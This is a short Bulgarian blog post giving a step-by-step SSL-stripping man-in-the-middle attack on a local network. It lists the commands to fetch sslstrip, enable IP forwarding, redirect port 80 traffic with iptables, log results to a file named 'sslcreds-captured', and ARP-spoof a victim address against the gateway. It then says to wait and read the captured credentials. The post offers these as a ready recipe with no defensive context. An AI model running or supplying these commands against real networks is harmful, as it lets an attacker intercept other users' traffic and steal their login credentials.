Всичко написано в този пост се ползва на собствена отговорност и никой освен Вас няма да е виновен ако си счупите главата!(и като стана дума, това важи за информацията в целия блог)
Този пост е вдъхновен от пост на колегата Singu в http://chzv.net.
По-точно този пост http://chzv.net/security/sslstrip-over-wifi
Тук ще си говорим за по-различен случай при който дали атаката е върху wifi или не няма значение.
Целта е да се хваща стрипнат от ssl криптация поток от информация.
Ето упътване стъпка по стъпка:
1. Сваляме и разпакетираме инструмента - sslstrip:
# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
# tar zxvf sslstrip-0.7.tar.gz
Тук е момента да се чувствате като дете което отваря коледен подарък :)
2. Настройки на системата, рутиране и sslstrip
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# python sslstrip.py -f -w sslcreds-captured
пренасочваме целят идващ трафик на порт 80 към порт 10000 (дефолтния порт за sslstrip и пускаме sslstrip да записва каквото си е намерил във файла sslcreds-captured
3. Време за отрова
# arpspoof -i eth0 -t 192.168.0.141 192.168.0.254
където 192.168.0.141 е жертвата а 192.168.0.254 - gateway-ят
4. Чакаме
5. Четем файла sslcreds-captured
Какво ли има там ?!
Няма коментари:
Публикуване на коментар